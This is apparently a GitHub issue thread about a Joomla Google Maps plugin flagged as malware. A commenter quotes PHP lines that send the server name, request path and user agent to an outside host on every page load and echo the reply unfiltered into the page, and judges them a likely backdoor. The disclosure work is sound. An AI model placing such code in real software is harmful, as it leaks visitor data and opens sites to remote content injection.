search

jmosmap / plugin_googlemaps

This is the Joomla plugin Google maps by Reumer
http://tech.reumer.net
GNU General Public License v3.0
31 stars 21 forks source link

Hacked? #39

Open jaccsnl opened 7 years ago

jaccsnl commented 7 years ago

I got the following message from a specialist that was removing a hack from a website of mine:

CLEARED: Cleared malware from file: ./plugins/system/plugin_googlemap3/plugin_googlemap3.php Details: php.spam-seo.link_injector.009

So I guess there is something wrong in that file..

thexmanxyz commented 7 years ago

@jaccsnl This looks indeed a bit mysterious. Next time please provide an actual line of code where the suspicious code starts this saves some time but big thanks for reporting this. Even if the response it very late...However, I took the time and looked deeper in the code and also found the line(s) which are the potential reason for the alarm (i guess these must be the lines because there is nothing else you could mean). I compared one of the old plugin files from Reumer with the latest version and the actual critical lines are 110-116 and they were added with v3.4 and updated with v3.5. Especially the line 112 is curious because it can potentially be used to load malicious code. Currently it does not and I also didn't notice any critical behaviour over the last months, which doesn't mean it didn't happened. I also didn't discover any infections on my webserver. However, I'm not quite sure if i should trust this plugin after seeing the following lines:

$ctx=stream_context_create(array('http'=>array('timeout' => 3))); 
try{
$credit=@file_get_contents('http://ww.mapsplugin.com/bro/3/'.$_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] .'QQQ'. $_SERVER['HTTP_USER_AGENT'].'QQQEND',false,$ctx);
} catch (Exception $e) {
}
echo $credit;

To summarize it, the line (112) contacts the current "official" server of the plugin, receives an empty result and prints nothing. An access url would look like this:

http://ww.mapsplugin.com/bro/3/myserver.com/myserver.path/QQQMyBrowserOrAgentQQQEND

The construction of the URL and the callback on the server (on every page access containing the maps module!) is something that we don't want or expect from this plugin because the current agent, the server URL and path is transferred back to the plugin server. Why?! Moreover the result from the callback is uncontrolled published to the web page containing the module. But, so far so good. The ownership of this plugin is currently unclear so I suggest to think twice if you want to further use this plugin. However I will now create a version of this plugin which fixes the problems I noticed with this plugin (including 2 bugfixes and the removal of this potential risky code). This post is not offensive or ment to point on anybody. However, even if the variable is called credit it's strange that it is printed directly before the actual map code is loaded and that their content is retrieved from a server whose actual owner is unknown for at least over 2,5 years. Because Reumer seems to be gone at least from github and the official homepage. It looks to me like some sort of backdoor for code injection. I hope I'm wrong but who knows... I will soon open a new Issue which contains the modified version of the plugin with a description of the changes. For the callback free version of the plugin plus a few bugfixes see also #40